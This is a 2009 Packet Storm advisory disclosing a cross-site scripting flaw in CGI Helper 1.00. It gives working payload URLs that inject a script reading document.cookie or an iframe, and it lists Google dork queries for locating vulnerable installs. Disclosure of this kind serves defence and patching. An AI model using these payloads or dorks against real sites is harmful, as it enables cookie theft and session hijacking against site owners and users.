CGI Helper 1.00 Cross Site Scripting

2009-10-05T00:00:00
ID PACKETSTORM:81811
Type packetstorm
Reporter Paulo Santos
Modified 2009-10-05T00:00:00

Description

                                        
                                            `## CGI Helper 1.00 ##  
  
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##  
  
## Discovered by: Paulo Santos ##  
  
## Contact: paulo@infocampoap.com.br ##  
  
## Blog: http://infocampo.wordpress.com ##  
  
The script CGI Helper 1.00 is vulnerable to XSS.  
  
Example:  
  
www.site.com/cgi-bin/helper.cgi  
  
XSS:  
  
www.site.com/cgi-bin/helper.cgi/>’><script>alert(document.cookie)</script>  
  
or  
  
Example:  
  
http://www.site.com/cgi-bin/cgihelper.pl  
  
XSS:  
  
http://www.site.com/cgi-bin/cgihelper.pl/>’><script>alert(document.cookie)</script>  
  
  
The script makes infinite iframes that can affect the user:  
  
http://www.site.com/cgi-bin/helper.cgi/>’><iframe src=http://www.google.com.br>  
  
or  
  
http://www.site.com/cgi-bin/cgihelper.pl/>’><iframe src=http://www.google.com.br>  
  
Google dork:  
  
inurl:cgihelper.pl  
  
inurl:cgi-bin/helper.cgi`